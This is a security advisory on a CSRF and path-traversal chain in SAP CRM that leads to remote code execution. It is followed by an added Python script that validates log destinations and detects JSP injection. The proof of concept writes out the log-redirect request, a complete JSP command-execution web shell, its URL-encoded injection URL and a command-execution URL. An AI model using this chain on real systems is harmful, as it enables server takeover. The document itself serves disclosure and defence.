[ERPSCAN-18-004] RCE via path Traversal using CSRF in SAP CRM
Application: SAP NetWeaver
Versions Affected: SAP CRM 13676083
Vendor URL: SAP
Bugs: CSRF, Path Traversal
Reported: 05.10.2017
Vendor response: 06.10.2017
Date of Public Advisory: 13.02.2018
Reference: SAP Security Note 2547431
Author: Vahagn Vardanyan (ERPScan), Vladimir Egorov (ERPScan)
VULNERABILITY INFORMATION
Class: Directory Traversal
Risk: Medium
Impact: An attacker could read the content of arbitrary files on the remote server, compromising the confidentiality of sensitive data
Remotely Exploitable: Yes
Locally Exploitable: Yes
CVSS Information
CVSS v3 Base Score: 6.6 / 10
CVSS v3 Base Vector:
Attack Vector (AV, related exploit range): Network (N)
Attack Complexity (AC, required attack complexity): Low (L)
Privileges Required (PR, level of privileges needed to exploit): High (H)
User Interaction (UI, required user participation): None (N)
Scope (S, change in scope due to impact on components beyond the vulnerable component): Changed (C)
Confidentiality impact (C): Low (L)
Integrity impact (I): Low (L)
Availability impact (A): Low (L)
DESCRIPTION
An attacker can change the path and extension of the SAP CRM log file by combining a path traversal with a CSRF vulnerability, write specially prepared Java (JSP) code into that log file, and then execute arbitrary commands via an HTTP request.
BUSINESS RISK
An attacker can use a Cross-Site Request Forgery vulnerability to exploit an authenticated user's session by making that user's browser send a request with a certain URL and specific parameters. The function is then executed with the authenticated user's rights. An attacker may use a Cross-Site Scripting vulnerability to achieve this, or may present a specially crafted link to the targeted user.
VULNERABLE PACKAGES
CRM JAVA APPLICATIONS 7.01 SP009
CRM JAVA APPLICATIONS 7.02 SP004
CRM JAVA APPLICATIONS 7.30 SP012
CRM JAVA APPLICATIONS 7.31 SP009
CRM JAVA APPLICATIONS 7.32 SP004
CRM JAVA APPLICATIONS 7.33 SP000
CRM JAVA APPLICATIONS 7.54 SP001
CRM JAVA COMPONENTS 7.01 SP009
CRM JAVA COMPONENTS 7.02 SP004
CRM JAVA COMPONENTS 7.30 SP012
CRM JAVA COMPONENTS 7.31 SP009
CRM JAVA COMPONENTS 7.32 SP004
CRM JAVA COMPONENTS 7.33 SP000
CRM JAVA COMPONENTS 7.54 SP001
CRM JAVA WEB COMPONENTS 7.01 SP009
CRM JAVA WEB COMPONENTS 7.02 SP004
CRM JAVA WEB COMPONENTS 7.30 SP012
CRM JAVA WEB COMPONENTS 7.31 SP009
CRM JAVA WEB COMPONENTS 7.32 SP004
CRM JAVA WEB COMPONENTS 7.33 SP000
SOLUTIONS AND WORKAROUNDS
To correct this vulnerability, install SAP Security Note 2547431.
TECHNICAL DESCRIPTION
Proof of Concept
Path Traversal
Using this path traversal, an attacker can change the CRM log path.

POST /b2b/admin/logging.jsp HTTP/1.1
Host: 172.16.10.65:50001
Connection: close
Content-Length: 302
Cache-Control: max-age=0
Origin: https://172.16.10.65:50001
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36 OPR/47.0.2631.71
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: https://172.16.10.65:50001/b2b/admin/logging.jsp?location=com.sap.isa&mode=edit&index=1
Accept-Encoding: gzip, deflate, br
Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.6,en;q=0.4
Cookie: 

xsrfid=1&selConfigName=com.sap.isa&selSeverity=0&selDest=C:\usr\sap\DM0\J00\j2ee\cluster\apps\sap.com\com.sap.engine.docs.examples\servlet_jsp\_default\root\shell.jsp&selLimit=10485760&selCount=20&selFormatterType=ListFormat&selPattern=none&mode=save&selLocationIdx=1
There is an authorization check here, but no CSRF token is required, even though CSRF protection was enabled in the configuration panel.

Uploading RCE
After the log file has been redirected this way, an attacker can send the request below, which carries a JSP shell, to the server; the server then writes the following JSP code into C:\usr\sap\DM0\J00\j2ee\cluster\apps\sap.com\com.sap.engine.docs.examples\servlet_jsp\_default\root\shell.jsp:

<%@ page import="java.util.*,java.io.*"%><% if (request.getParameter("cmd") != null){Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));OutputStream os = p.getOutputStream(); InputStream in = p.getInputStream(); DataInputStream dis = new DataInputStream(in); String disr = dis.readLine(); out.println("<PRE>"); while ( disr != null ) {out.println(disr);disr =dis.readLine();}out.println("</PRE>");} %>

https://172.16.10.65:50001/b2b/init.do?"]%3c%25%40+page+import%3d"java.util.*,java.io.*"%25>%3c%25+if+(request.getParameter("cmd")+!%3d+null){Process+p+%3d+Runtime.getRuntime().exec(request.getParameter("cmd"))%3bOutputStream+os+%3d+p.getOutputStream()%3b+InputStream+in+%3d+p.getInputStream()%3b+DataInputStream+dis+%3d+new+DataInputStream(in)%3b+String+disr+%3d+dis.readLine()%3b+out.println("<PRE>")%3b+while+(+disr+!%3d+null+)+{out.println(disr)%3bdisr+%3ddis.readLine()%3b}out.println("</PRE>")%3b}+%25>["#
Executing RCE
https://172.16.10.65:50001/shell.0.jsp?cmd=ipconfig
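As an added example (not ERPScan's or SAP's code), the following Python script shows the two checks a defender would want against the steps above: validating that a saved log destination stays inside the expected log directory with a log extension (the path-traversal step), and flagging requests whose parameters carry JSP scriptlet markers before they reach a log file (the log-injection step). The endpoint and parameter names (/b2b/admin/logging.jsp, mode=save, selDest, /b2b/init.do) are taken from the advisory; the allowed log directory, the hypothetical helper names and the sample requests are constructed for the example.

```python
"""Defensive checks for the log-configuration weakness in this advisory.

Added example, not ERPScan's or SAP's code.  Endpoint and parameter names
(/b2b/admin/logging.jsp, mode=save, selDest, /b2b/init.do) come from the
advisory; ALLOWED_LOG_DIR and the sample requests are constructed.
"""
import ntpath
import re
from urllib.parse import parse_qs, urlsplit

# Constructed: the directory an administrator expects CRM log files to live in.
ALLOWED_LOG_DIR = r"C:\usr\sap\DM0\J00\j2ee\cluster\server0\log"
ALLOWED_EXTENSIONS = (".log", ".trc")

# Opener of a JSP scriptlet, directive or expression.  A request parameter
# containing it that is later written to a file the servlet engine can
# execute is the log-injection step shown in the advisory.
JSP_MARKER = re.compile(r"<%")


def is_safe_log_destination(dest, base_dir=ALLOWED_LOG_DIR, exts=ALLOWED_EXTENSIONS):
    """True only if dest resolves inside base_dir and has an allowed extension.

    ntpath is used on purpose: the affected host in the advisory runs Windows,
    so '..' segments, forward slashes and case differences are collapsed the
    way that file system would collapse them, whatever platform this runs on.
    """
    norm = ntpath.normpath(ntpath.normcase(dest))
    base = ntpath.normpath(ntpath.normcase(base_dir))
    try:
        inside = ntpath.commonpath([norm, base]) == base
    except ValueError:  # relative path, or a different drive letter
        inside = False
    return inside and ntpath.splitext(norm)[1] in exts


def inspect_request(method, target, body=""):
    """Return findings for one request given as (method, path?query, form body)."""
    findings = []
    url = urlsplit(target)
    query = parse_qs(url.query, keep_blank_values=True)
    form = parse_qs(body, keep_blank_values=True) if method == "POST" else {}

    # Check 1: a log-configuration save whose destination leaves the log
    # directory or changes the extension.
    if url.path.endswith("/admin/logging.jsp") and form.get("mode") == ["save"]:
        for dest in form.get("selDest", []):
            if not is_safe_log_destination(dest):
                findings.append(f"log destination rejected: {dest}")

    # Check 2: JSP markers anywhere in the parameters.  parse_qs has already
    # percent-decoded them; a parameter without '=' keeps its text as the
    # name, so names are inspected as well as values.
    for name, values in [*query.items(), *form.items()]:
        if any(JSP_MARKER.search(s) for s in (name, *values)):
            findings.append(f"JSP scriptlet marker in parameter {name[:32]!r}")
    return findings


# Constructed sample requests: the first mirrors the advisory's save request,
# the second is a legitimate save, the third a log-injection attempt with a
# placeholder scriptlet (not the advisory's payload), the fourth ordinary traffic.
SAMPLES = [
    ("POST", "/b2b/admin/logging.jsp",
     r"selConfigName=com.sap.isa&selDest=C:\usr\sap\DM0\J00\j2ee\cluster\apps"
     r"\sap.com\com.sap.engine.docs.examples\servlet_jsp\_default\root\shell.jsp"
     r"&mode=save&selLocationIdx=1"),
    ("POST", "/b2b/admin/logging.jsp",
     r"selConfigName=com.sap.isa&selDest=C:\usr\sap\DM0\J00\j2ee\cluster"
     r"\server0\log\isa.log&mode=save&selLocationIdx=1"),
    ("GET", '/b2b/init.do?"]%3c%25+out.print(1)%3b+%25>["', ""),
    ("GET", "/b2b/init.do?page=catalog", ""),
]


def scan(samples=SAMPLES):
    """Return one findings list per sample, in order (empty when clean)."""
    return [inspect_request(method, target, body) for method, target, body in samples]


if __name__ == "__main__":
    for (method, target, _), found in zip(SAMPLES, scan()):
        print(method, target[:48], "->", found or "clean")
```

In the real application the destination check belongs in the logging.jsp save handler, next to a per-session anti-CSRF token that the request must carry; the request inspection is the same logic run at a reverse proxy or over captured traffic for detection.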
